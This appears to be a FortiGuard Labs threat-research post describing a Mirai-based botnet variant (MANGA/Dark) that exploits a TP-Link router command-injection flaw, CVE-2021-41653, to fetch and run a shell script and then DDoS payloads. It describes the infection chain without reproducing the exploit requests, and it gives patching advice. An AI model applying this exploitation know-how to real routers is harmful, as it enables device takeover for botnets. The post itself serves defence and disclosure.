Last week, our FortiGuard Labs team encountered a malware sample that’s currently being distributed in the wild targeting TP-link wireless routers. It leverages a recently post-authenticated RCE vulnerability released barely two weeks prior.
As it turns out, it is an updated variant of the MANGA campaign (also known as Dark) that distributes samples based on Mirai’s published source code. This Mirai-based Distributed Denial of Service (DDOS) botnet campaign is one that FortiGuard Labs has been actively monitoring. The campaign originally piqued our interest due to the continuous updating of its list of target vulnerabilities—more so than other campaigns we have seen so far.
TP-Link has already released an updated firmware for this affected hardware version and users are strongly encouraged to update their devices.
This post details how this threat leverages the new vulnerability to take over the affected devices and ways to protect users from these attacks.
Exploiting a New Vulnerability
This Mirai-based botnet campaign is referred to as MANGA because of the token string it used to include in its SSH/telnet commands. It is also referred to as Dark due to the filenames used for its binaries (e.g., Dark.arm, dark.mips, etc.).
By exploiting recently published vulnerabilities, this malware campaign capitalizes on the gap between the time of disclosure of a vulnerability and the application of a patch to compromise IoT devices. This gives it a higher potential of spreading, making it more prolific than similar botnets. The latest addition to its constantly growing list of targeted vulnerabilities is TP-Link Home Wireless Routers, particularly the TL-WR840N EU (V5) model.
The vulnerability it targets, assigned CVE-2021-41653, was only just discovered on November 12 of this year. And barely two weeks later, on November 22, a sample from the MANGA malware campaign was seen actively exploiting it in the wild.
Kamilló Matek discusses the full details of this vulnerability in this article. In summary, a vulnerable host parameter allows authenticated users to execute arbitrary commands in the target device.
In this case, it is being exploited to force vulnerable devices to download and execute a malicious script, tshit.sh, which then downloads the main binary payloads, as discussed in the next section.
To accomplish this, the following requests are sent to the device:
It is important to emphasize that this exploitation requires authentication to succeed. Therefore, it is crucial for users to change their default credentials.
As with Mirai’s normal infection routine, the executed shell script downloads the main payload binaries for different architectures and platforms and executes them blindly in the victim’s system. In addition, it prevents other botnets from taking over the device by blocking connections to commonly targeted ports.
The malware then waits for a command from its Command-and-Control (C2) server to perform different variations of a Denial-Of-Service (DOS) attack.
Fortinet customers are protected by the following:
- The following generic FortiGuard IPS signatures were able to detect this attack before this vulnerability was disclosed:
- The FortiGuard Web Filtering Service blocks downloaded URLs and identified C2s.
- The FortiGuard AntiVirus service detects and blocks this threat as Linux/Mirai and ELF/Mirai
Through our active monitoring, we encountered a new variant of the Mirai-based botnet campaign referred to as MANGA or Dark. It targets a recently published TP-Link wireless router RCE vulnerability.
Throughout its life, this ongoing campaign has been very active in targeting newly discovered vulnerabilities. In fact, right before this blog was published, our monitoring system encountered yet another updated variant that we are currently investigating.
FortiGuard Labs will continue monitoring this campaign and provide updates as necessary.